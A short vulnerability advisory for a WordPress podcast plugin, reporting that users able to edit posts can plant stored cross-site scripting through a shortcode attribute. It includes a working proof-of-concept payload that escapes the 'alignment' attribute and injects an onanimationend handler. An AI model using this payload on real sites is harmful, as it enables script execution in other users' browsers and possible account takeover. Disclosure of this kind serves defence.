The plugin allows users with any role capable of editing or adding posts to perform stored XSS.
Add the below payload as a shortcode block: [podcast_subscribe alignment=‘" style=“animation-name:twentytwentyone-close-button-transition” onanimationend="alert(origin)//’]